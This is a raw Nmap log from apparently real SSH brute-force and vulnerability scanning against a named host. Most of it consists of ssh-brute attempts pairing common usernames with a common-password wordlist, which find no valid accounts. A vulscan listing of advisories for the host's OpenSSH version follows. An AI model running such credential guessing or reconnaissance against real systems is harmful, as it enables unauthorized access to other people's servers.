17479NSE: [ssh-brute] Trying username/password pair: user:michael
17480NSE: [ssh-brute] Trying username/password pair: web:michael
17481NSE: [ssh-brute] Trying username/password pair: test:michael
17482NSE: [ssh-brute] Trying username/password pair: root:jessica
17483NSE: [ssh-brute] Trying username/password pair: admin:jessica
17484NSE: [ssh-brute] Trying username/password pair: administrator:jessica
17485NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
17486NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
17487NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
17488NSE: [ssh-brute] Trying username/password pair: guest:jessica
17489NSE: [ssh-brute] Trying username/password pair: user:jessica
17490NSE: [ssh-brute] Trying username/password pair: web:jessica
17491NSE: [ssh-brute] Trying username/password pair: test:jessica
17492NSE: [ssh-brute] Trying username/password pair: root:111111
17493NSE: [ssh-brute] Trying username/password pair: admin:111111
17494NSE: [ssh-brute] Trying username/password pair: administrator:111111
17495NSE: [ssh-brute] Trying username/password pair: webadmin:111111
17496NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
17497NSE: [ssh-brute] Trying username/password pair: netadmin:111111
17498NSE: [ssh-brute] Trying username/password pair: guest:111111
17499NSE: [ssh-brute] Trying username/password pair: user:111111
17500NSE: [ssh-brute] Trying username/password pair: web:111111
17501NSE: [ssh-brute] Trying username/password pair: test:111111
17502NSE: [ssh-brute] Trying username/password pair: root:ashley
17503NSE: [ssh-brute] Trying username/password pair: admin:ashley
17504NSE: [ssh-brute] Trying username/password pair: administrator:ashley
17505NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
17506NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
17507NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
17508NSE: [ssh-brute] Trying username/password pair: guest:ashley
17509NSE: [ssh-brute] Trying username/password pair: user:ashley
17510NSE: [ssh-brute] Trying username/password pair: web:ashley
17511NSE: [ssh-brute] Trying username/password pair: test:ashley
17512NSE: [ssh-brute] Trying username/password pair: root:000000
17513NSE: [ssh-brute] Trying username/password pair: admin:000000
17514NSE: [ssh-brute] Trying username/password pair: administrator:000000
17515NSE: [ssh-brute] Trying username/password pair: webadmin:000000
17516NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
17517NSE: [ssh-brute] Trying username/password pair: netadmin:000000
17518NSE: [ssh-brute] Trying username/password pair: guest:000000
17519NSE: [ssh-brute] Trying username/password pair: user:000000
17520NSE: [ssh-brute] Trying username/password pair: web:000000
17521NSE: [ssh-brute] Trying username/password pair: test:000000
17522NSE: [ssh-brute] Trying username/password pair: root:iloveu
17523NSE: [ssh-brute] Trying username/password pair: admin:iloveu
17524NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
17525NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
17526NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
17527NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
17528NSE: [ssh-brute] Trying username/password pair: guest:iloveu
17529NSE: [ssh-brute] Trying username/password pair: user:iloveu
17530NSE: [ssh-brute] Trying username/password pair: web:iloveu
17531NSE: [ssh-brute] Trying username/password pair: test:iloveu
17532NSE: [ssh-brute] Trying username/password pair: root:michelle
17533NSE: [ssh-brute] Trying username/password pair: admin:michelle
17534NSE: [ssh-brute] Trying username/password pair: administrator:michelle
17535NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
17536NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
17537NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
17538NSE: [ssh-brute] Trying username/password pair: guest:michelle
17539NSE: [ssh-brute] Trying username/password pair: user:michelle
17540NSE: [ssh-brute] Trying username/password pair: web:michelle
17541NSE: [ssh-brute] Trying username/password pair: test:michelle
17542NSE: [ssh-brute] Trying username/password pair: root:tigger
17543NSE: [ssh-brute] Trying username/password pair: admin:tigger
17544NSE: [ssh-brute] Trying username/password pair: administrator:tigger
17545NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
17546NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
17547NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
17548NSE: [ssh-brute] Trying username/password pair: guest:tigger
17549NSE: [ssh-brute] Trying username/password pair: user:tigger
17550NSE: [ssh-brute] Trying username/password pair: web:tigger
17551NSE: [ssh-brute] Trying username/password pair: test:tigger
17552NSE: [ssh-brute] Trying username/password pair: root:sunshine
17553NSE: [ssh-brute] Trying username/password pair: admin:sunshine
17554NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
17555NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
17556NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
17557NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
17558NSE: [ssh-brute] Trying username/password pair: guest:sunshine
17559NSE: [ssh-brute] Trying username/password pair: user:sunshine
17560NSE: [ssh-brute] Trying username/password pair: web:sunshine
17561NSE: [ssh-brute] Trying username/password pair: test:sunshine
17562NSE: [ssh-brute] Trying username/password pair: root:chocolate
17563NSE: [ssh-brute] Trying username/password pair: admin:chocolate
17564NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
17565NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
17566NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
17567NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
17568NSE: [ssh-brute] Trying username/password pair: guest:chocolate
17569NSE: [ssh-brute] Trying username/password pair: user:chocolate
17570NSE: [ssh-brute] Trying username/password pair: web:chocolate
17571NSE: [ssh-brute] Trying username/password pair: test:chocolate
17572NSE: [ssh-brute] Trying username/password pair: root:password1
17573NSE: [ssh-brute] Trying username/password pair: admin:password1
17574NSE: [ssh-brute] Trying username/password pair: administrator:password1
17575NSE: [ssh-brute] Trying username/password pair: webadmin:password1
17576NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
17577NSE: [ssh-brute] Trying username/password pair: netadmin:password1
17578NSE: [ssh-brute] Trying username/password pair: guest:password1
17579NSE: [ssh-brute] Trying username/password pair: user:password1
17580NSE: [ssh-brute] Trying username/password pair: web:password1
17581NSE: [ssh-brute] Trying username/password pair: test:password1
17582NSE: [ssh-brute] Trying username/password pair: root:soccer
17583NSE: [ssh-brute] Trying username/password pair: admin:soccer
17584NSE: [ssh-brute] Trying username/password pair: administrator:soccer
17585NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
17586NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
17587NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
17588NSE: [ssh-brute] Trying username/password pair: guest:soccer
17589NSE: [ssh-brute] Trying username/password pair: user:soccer
17590NSE: [ssh-brute] Trying username/password pair: web:soccer
17591NSE: [ssh-brute] Trying username/password pair: test:soccer
17592NSE: [ssh-brute] Trying username/password pair: root:anthony
17593NSE: [ssh-brute] Trying username/password pair: admin:anthony
17594NSE: [ssh-brute] Trying username/password pair: administrator:anthony
17595NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
17596NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
17597NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
17598NSE: [ssh-brute] Trying username/password pair: guest:anthony
17599NSE: [ssh-brute] Trying username/password pair: user:anthony
17600NSE: [ssh-brute] Trying username/password pair: web:anthony
17601NSE: [ssh-brute] Trying username/password pair: test:anthony
17602NSE: [ssh-brute] Trying username/password pair: root:friends
17603NSE: [ssh-brute] Trying username/password pair: admin:friends
17604NSE: [ssh-brute] Trying username/password pair: administrator:friends
17605NSE: [ssh-brute] Trying username/password pair: webadmin:friends
17606NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
17607NSE: [ssh-brute] Trying username/password pair: netadmin:friends
17608NSE: [ssh-brute] Trying username/password pair: guest:friends
17609NSE: [ssh-brute] Trying username/password pair: user:friends
17610NSE: [ssh-brute] Trying username/password pair: web:friends
17611NSE: [ssh-brute] Trying username/password pair: test:friends
17612NSE: [ssh-brute] Trying username/password pair: root:purple
17613NSE: [ssh-brute] Trying username/password pair: admin:purple
17614NSE: [ssh-brute] Trying username/password pair: administrator:purple
17615NSE: [ssh-brute] Trying username/password pair: webadmin:purple
17616NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
17617NSE: [ssh-brute] Trying username/password pair: netadmin:purple
17618NSE: [ssh-brute] Trying username/password pair: guest:purple
17619NSE: [ssh-brute] Trying username/password pair: user:purple
17620NSE: [ssh-brute] Trying username/password pair: web:purple
17621NSE: [ssh-brute] Trying username/password pair: test:purple
17622NSE: [ssh-brute] Trying username/password pair: root:angel
17623NSE: [ssh-brute] Trying username/password pair: admin:angel
17624NSE: [ssh-brute] Trying username/password pair: administrator:angel
17625NSE: [ssh-brute] Trying username/password pair: webadmin:angel
17626NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
17627NSE: [ssh-brute] Trying username/password pair: netadmin:angel
17628NSE: [ssh-brute] Trying username/password pair: guest:angel
17629NSE: [ssh-brute] Trying username/password pair: user:angel
17630NSE: [ssh-brute] Trying username/password pair: web:angel
17631NSE: [ssh-brute] Trying username/password pair: test:angel
17632NSE: [ssh-brute] Trying username/password pair: root:butterfly
17633NSE: [ssh-brute] Trying username/password pair: admin:butterfly
17634NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
17635NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
17636NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
17637NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
17638NSE: [ssh-brute] Trying username/password pair: guest:butterfly
17639NSE: [ssh-brute] Trying username/password pair: user:butterfly
17640NSE: [ssh-brute] Trying username/password pair: web:butterfly
17641NSE: [ssh-brute] Trying username/password pair: test:butterfly
17642NSE: [ssh-brute] Trying username/password pair: root:jordan
17643NSE: [ssh-brute] Trying username/password pair: admin:jordan
17644NSE: [ssh-brute] Trying username/password pair: administrator:jordan
17645NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
17646NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
17647NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
17648NSE: [ssh-brute] Trying username/password pair: guest:jordan
17649NSE: [ssh-brute] Trying username/password pair: user:jordan
17650NSE: [ssh-brute] Trying username/password pair: web:jordan
17651NSE: [ssh-brute] Trying username/password pair: test:jordan
17652NSE: [ssh-brute] Trying username/password pair: root:fuckyou
17653NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
17654NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
17655NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
17656NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
17657NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
17658NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
17659NSE: [ssh-brute] Trying username/password pair: user:fuckyou
17660NSE: [ssh-brute] Trying username/password pair: web:fuckyou
17661NSE: [ssh-brute] Trying username/password pair: test:fuckyou
17662NSE: [ssh-brute] Trying username/password pair: root:123123
17663NSE: [ssh-brute] Trying username/password pair: admin:123123
17664NSE: [ssh-brute] Trying username/password pair: administrator:123123
17665NSE: [ssh-brute] Trying username/password pair: webadmin:123123
17666NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
17667NSE: [ssh-brute] Trying username/password pair: netadmin:123123
17668NSE: [ssh-brute] Trying username/password pair: guest:123123
17669NSE: [ssh-brute] Trying username/password pair: user:123123
17670NSE: [ssh-brute] Trying username/password pair: web:123123
17671NSE: [ssh-brute] Trying username/password pair: test:123123
17672NSE: [ssh-brute] Trying username/password pair: root:justin
17673NSE: [ssh-brute] Trying username/password pair: admin:justin
17674NSE: [ssh-brute] Trying username/password pair: administrator:justin
17675NSE: [ssh-brute] Trying username/password pair: webadmin:justin
17676NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
17677NSE: [ssh-brute] Trying username/password pair: netadmin:justin
17678NSE: [ssh-brute] Trying username/password pair: guest:justin
17679NSE: [ssh-brute] Trying username/password pair: user:justin
17680NSE: [ssh-brute] Trying username/password pair: web:justin
17681NSE: [ssh-brute] Trying username/password pair: test:justin
17682NSE: [ssh-brute] Trying username/password pair: root:liverpool
17683NSE: [ssh-brute] Trying username/password pair: admin:liverpool
17684NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
17685NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
17686NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
17687NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
17688NSE: [ssh-brute] Trying username/password pair: guest:liverpool
17689NSE: [ssh-brute] Trying username/password pair: user:liverpool
17690NSE: [ssh-brute] Trying username/password pair: web:liverpool
17691NSE: [ssh-brute] Trying username/password pair: test:liverpool
17692NSE: [ssh-brute] Trying username/password pair: root:football
17693NSE: [ssh-brute] Trying username/password pair: admin:football
17694NSE: [ssh-brute] Trying username/password pair: administrator:football
17695NSE: [ssh-brute] Trying username/password pair: webadmin:football
17696NSE: [ssh-brute] Trying username/password pair: sysadmin:football
17697NSE: [ssh-brute] Trying username/password pair: netadmin:football
17698NSE: [ssh-brute] Trying username/password pair: guest:football
17699NSE: [ssh-brute] Trying username/password pair: user:football
17700NSE: [ssh-brute] Trying username/password pair: web:football
17701NSE: [ssh-brute] Trying username/password pair: test:football
17702NSE: [ssh-brute] Trying username/password pair: root:loveme
17703NSE: [ssh-brute] Trying username/password pair: admin:loveme
17704NSE: [ssh-brute] Trying username/password pair: administrator:loveme
17705NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
17706NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
17707NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
17708NSE: [ssh-brute] Trying username/password pair: guest:loveme
17709NSE: [ssh-brute] Trying username/password pair: user:loveme
17710NSE: [ssh-brute] Trying username/password pair: web:loveme
17711NSE: [ssh-brute] Trying username/password pair: test:loveme
17712NSE: [ssh-brute] Trying username/password pair: root:secret
17713NSE: [ssh-brute] Trying username/password pair: admin:secret
17714NSE: [ssh-brute] Trying username/password pair: administrator:secret
17715NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
17716NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
17717NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
17718Nmap scan report for latina.petite.guru (185.82.200.52)
17719Host is up (0.12s latency).
17720
17721PORT STATE SERVICE VERSION
1772222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
17723| ssh-auth-methods:
17724| Supported authentication methods:
17725| publickey
17726|_ password
17727| ssh-brute:
17728| Accounts: No valid accounts found
17729|_ Statistics: Performed 423 guesses in 181 seconds, average tps: 2.5
17730| ssh-hostkey:
17731| 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
17732| 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
17733| 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
17734|_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
17735| ssh-publickey-acceptance:
17736|_ Accepted Public Keys: No public keys accepted
17737|_ssh-run: Failed to specify credentials and command to run.
17738| vulscan: VulDB - https://vuldb.com:
17739| [76870] OpenSSH up to 6.9 auth2-chall.c kbdint_next_device privilege escalation
17740| [76326] OpenSSH 6.8 XSECURITY privilege escalation
17741| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate weak authentication
17742| [12683] OpenBSD OpenSSH up to 6.5 Configuration child_set_env Wildcard privilege escalation
17743| [12124] OpenSSH 6.4 J-PAKE Protocol schnorr.c hash_buffer denial of service
17744| [11124] OpenSSH 6.2/6.3 Post Authentication sshd process initialize mm_newkeys_from_blob privilege escalation
17745|
17746| MITRE CVE - https://cve.mitre.org:
17747| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
17748| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
17749| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
17750| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
17751| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
17752| [CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
17753|
17754| SecurityFocus - https://www.securityfocus.com/bid/:
17755| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
17756| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
17757| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
17758| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
17759| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
17760| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
17761| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
17762| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
17763| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
17764| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
17765| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
17766| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
17767| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
17768| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
17769| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
17770| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
17771| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
17772| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
17773| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
17774| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
17775| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
17776| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
17777| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
17778| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
17779| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
17780| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
17781| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
17782| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
17783| [75990] OpenSSH Login Handling Security Bypass Weakness
17784| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
17785| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
17786| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
17787| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
17788| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
17789| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
17790| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
17791| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
17792| [61286] OpenSSH Remote Denial of Service Vulnerability
17793| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
17794| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
17795| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
17796| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
17797| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
17798| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
17799| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
17800| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
17801| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
17802| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
17803| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
17804| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
17805| [30794] Red Hat OpenSSH Backdoor Vulnerability
17806| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
17807| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
17808| [28531] OpenSSH ForceCommand Command Execution Weakness
17809| [28444] OpenSSH X Connections Session Hijacking Vulnerability
17810| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
17811| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
17812| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
17813| [20956] OpenSSH Privilege Separation Key Signature Weakness
17814| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
17815| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
17816| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
17817| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
17818| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
17819| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
17820| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
17821| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
17822| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
17823| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
17824| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
17825| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
17826| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
17827| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
17828| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
17829| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
17830| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
17831| [6168] OpenSSH Visible Password Vulnerability
17832| [5374] OpenSSH Trojan Horse Vulnerability
17833| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
17834| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
17835| [4241] OpenSSH Channel Code Off-By-One Vulnerability
17836| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
17837| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
17838| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
17839| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
17840| [2917] OpenSSH PAM Session Evasion Vulnerability
17841| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
17842| [2356] OpenSSH Private Key Authentication Check Vulnerability
17843| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
17844| [1334] OpenSSH UseLogin Vulnerability
17845|
17846| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17847| [83258] GSI-OpenSSH auth-pam.c security bypass
17848| [82781] OpenSSH time limit denial of service
17849| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
17850| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
17851| [72756] Debian openssh-server commands information disclosure
17852| [68339] OpenSSH pam_thread buffer overflow
17853| [67264] OpenSSH ssh-keysign unauthorized access
17854| [65910] OpenSSH remote_glob function denial of service
17855| [65163] OpenSSH certificate information disclosure
17856| [64387] OpenSSH J-PAKE security bypass
17857| [63337] Cisco Unified Videoconferencing OpenSSH weak security
17858| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
17859| [45202] OpenSSH signal handler denial of service
17860| [44747] RHEL OpenSSH backdoor
17861| [44280] OpenSSH PermitRootLogin information disclosure
17862| [44279] OpenSSH sshd weak security
17863| [44037] OpenSSH sshd SELinux role unauthorized access
17864| [43940] OpenSSH X11 forwarding information disclosure
17865| [41549] OpenSSH ForceCommand directive security bypass
17866| [41438] OpenSSH sshd session hijacking
17867| [40897] OpenSSH known_hosts weak security
17868| [40587] OpenSSH username weak security
17869| [37371] OpenSSH username data manipulation
17870| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
17871| [37112] RHSA update for OpenSSH signal handler race condition not installed
17872| [37107] RHSA update for OpenSSH identical block denial of service not installed
17873| [36637] OpenSSH X11 cookie privilege escalation
17874| [35167] OpenSSH packet.c newkeys[mode] denial of service
17875| [34490] OpenSSH OPIE information disclosure
17876| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
17877| [32975] Apple Mac OS X OpenSSH denial of service
17878| [32387] RHSA-2006:0738 updates for openssh not installed
17879| [32359] RHSA-2006:0697 updates for openssh not installed
17880| [32230] RHSA-2006:0298 updates for openssh not installed
17881| [32132] RHSA-2006:0044 updates for openssh not installed
17882| [30120] OpenSSH privilege separation monitor authentication verification weakness
17883| [29255] OpenSSH GSSAPI user enumeration
17884| [29254] OpenSSH signal handler race condition
17885| [29158] OpenSSH identical block denial of service
17886| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
17887| [25116] OpenSSH OpenPAM denial of service
17888| [24305] OpenSSH SCP shell expansion command execution
17889| [22665] RHSA-2005:106 updates for openssh not installed
17890| [22117] OpenSSH GSSAPI allows elevated privileges
17891| [22115] OpenSSH GatewayPorts security bypass
17892| [20930] OpenSSH sshd.c LoginGraceTime denial of service
17893| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
17894| [17213] OpenSSH allows port bouncing attacks
17895| [16323] OpenSSH scp file overwrite
17896| [13797] OpenSSH PAM information leak
17897| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
17898| [13264] OpenSSH PAM code could allow an attacker to gain access
17899| [13215] OpenSSH buffer management errors could allow an attacker to execute code
17900| [13214] OpenSSH memory vulnerabilities
17901| [13191] OpenSSH large packet buffer overflow
17902| [12196] OpenSSH could allow an attacker to bypass login restrictions
17903| [11970] OpenSSH could allow an attacker to obtain valid administrative account
17904| [11902] OpenSSH PAM support enabled information leak
17905| [9803] OpenSSH "
17906| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
17907| [9307] OpenSSH is running on the system
17908| [9169] OpenSSH "
17909| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
17910| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
17911| [8383] OpenSSH off-by-one error in channel code
17912| [7647] OpenSSH UseLogin option arbitrary code execution
17913| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
17914| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
17915| [7179] OpenSSH source IP access control bypass
17916| [6757] OpenSSH "
17917| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
17918| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
17919| [5517] OpenSSH allows unauthorized access to resources
17920| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
17921|
17922| Exploit-DB - https://www.exploit-db.com:
17923| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
17924|
17925| OpenVAS (Nessus) - http://www.openvas.org:
17926| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
17927| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
17928| [881183] CentOS Update for openssh CESA-2012:0884 centos6
17929| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
17930| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
17931| [870763] RedHat Update for openssh RHSA-2012:0884-04
17932| [870129] RedHat Update for openssh RHSA-2008:0855-01
17933| [861813] Fedora Update for openssh FEDORA-2010-5429
17934| [861319] Fedora Update for openssh FEDORA-2007-395
17935| [861170] Fedora Update for openssh FEDORA-2007-394
17936| [861012] Fedora Update for openssh FEDORA-2007-715
17937| [840345] Ubuntu Update for openssh vulnerability USN-597-1
17938| [840300] Ubuntu Update for openssh update USN-612-5
17939| [840271] Ubuntu Update for openssh vulnerability USN-612-2
17940| [840268] Ubuntu Update for openssh update USN-612-7
17941| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
17942| [840214] Ubuntu Update for openssh vulnerability USN-566-1
17943| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
17944| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
17945| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
